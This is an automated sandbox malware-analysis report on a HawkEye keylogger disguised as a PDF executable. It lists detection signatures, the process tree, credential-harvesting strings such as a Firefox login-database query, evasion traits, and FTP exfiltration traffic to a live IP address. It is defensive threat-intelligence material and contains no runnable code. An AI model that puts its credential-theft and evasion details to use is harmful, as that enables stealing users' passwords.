
Windows Analysis Report 300821.PDF.exe

Overview

General Information

Sample Name: 300821.PDF.exe
Analysis ID: 473673
MD5: ddfc57b8fd3e5e0f81dee8ead0e38518
SHA1: ca35000ed1844f30e932d8903633e4beb519967f
SHA256: c1cd0692836798f5cb7e9335f4547a2650b77cf456193cbe7e384906a20c0603
Tags: exe, hawkeye

Most interesting Screenshot:

Detection

HawkEye, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected MailPassView
Multi AV Scanner detection for submitted file
Yara detected HawkEye Keylogger
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Detected HawkEye Rat
Sample uses process hollowing technique
Initial sample is a PE file and has a suspicious name
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Tries to steal Mail credentials (via file registry)
Changes the view of files in windows explorer (hidden files and folders)
.NET source code contains potential unpacker
Yara detected WebBrowserPassView password recovery tool
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
May infect USB drives
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to detect virtual machines (SGDT)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • 300821.PDF.exe (PID: 4816 cmdline: 'C:\Users\user\Desktop\300821.PDF.exe' MD5: DDFC57B8FD3E5E0F81DEE8EAD0E38518)
    • 300821.PDF.exe (PID: 2848 cmdline: C:\Users\user\Desktop\300821.PDF.exe MD5: DDFC57B8FD3E5E0F81DEE8EAD0E38518)
      • vbc.exe (PID: 1668 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 5604 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["mailpv", "Mail PassView"], "Version": ""}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000009.00000002.684649797.0000000000400000.00000040.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
(5 of 25 entries shown)

Unpacked PEs

Source | Rule | Description | Author
5.2.300821.PDF.exe.45fa72.1.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
9.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
5.2.300821.PDF.exe.3b69930.8.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
5.2.300821.PDF.exe.409c0d.3.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
9.2.vbc.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
(5 of 73 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Double Extension
Source: Process started; Author: Florian Roth (rule), @blu3_team (idea); Data: Command: C:\Users\user\Desktop\300821.PDF.exe, CommandLine: C:\Users\user\Desktop\300821.PDF.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\300821.PDF.exe, NewProcessName: C:\Users\user\Desktop\300821.PDF.exe, OriginalFileName: C:\Users\user\Desktop\300821.PDF.exe, ParentCommandLine: 'C:\Users\user\Desktop\300821.PDF.exe' , ParentImage: C:\Users\user\Desktop\300821.PDF.exe, ParentProcessId: 4816, ProcessCommandLine: C:\Users\user\Desktop\300821.PDF.exe, ProcessId: 2848

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: vbc.exe.5604.9.memstrmin; Malware Configuration Extractor: HawkEye {"Modules": ["mailpv", "Mail PassView"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: 300821.PDF.exe; ReversingLabs: Detection: 21%
Source: 0.2.300821.PDF.exe.4d2ad28.6.unpack; Avira: Label: TR/Inject.vcoldi
Source: 5.2.300821.PDF.exe.400000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.300821.PDF.exe.400000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 300821.PDF.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 300821.PDF.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb; source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb; source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb; source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp; Binary or memory string: autorun.inf
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp; Binary or memory string: [autorun]
Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp; Binary or memory string: autorun.inf
Source: 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp; Binary or memory string: [autorun]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 9_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Users\user\Desktop\300821.PDF.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h]

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.4:49723 -> 66.70.204.222:21
Source: Joe Sandbox View; ASN Name: OVHFR
Source: Joe Sandbox View; IP Address: 66.70.204.222
Source: global traffic; TCP traffic: 192.168.2.4:49724 -> 66.70.204.222:51945
Source: unknown; FTP traffic detected: 66.70.204.222:21 -> 192.168.2.4:49723 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 5 of 50 allowed. 220-Local time is now 08:55. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp; String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe, 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp; String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe; String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 00000008.00000003.691619174.00000000021F5000.00000004.00000001.sdmp, bhvE2B1.tmp.8.dr; String found in binary or memory: http://172.217.23.78/
Source: vbc.exe, 00000008.00000003.691851987.00000000021F5000.00000004.00000001.sdmp; String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/name=euconsent&value=&expire=0&isFirstRequest=truef5-b8c0-4
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp; String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: 300821.PDF.exe, 00000005.00000002.915724123.0000000002DB5000.00000004.00000001.sdmp; String found in binary or memory: http://ftp.vn-gpack.org
Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.comodoca.com0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0:
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0B
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0E
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0F
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0K
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0M
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0R
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gsr202
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0-
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=333&w=311
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eTok.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=333&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ywNG.img?h=75&w=100
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://support.google.com/accounts/answer/151657
                      Source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.google.com/
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/
                      Source: vbc.exe, 00000008.00000003.691264429.00000000021F5000.00000004.00000001.sdmp, bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
                      Source: bhvE2B1.tmp.8.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
                      Source: vbc.exe, vbc.exe, 00000009.00000002.684649797.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: 300821.PDF.exe, 00000000.00000002.669654926.0000000006FF2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
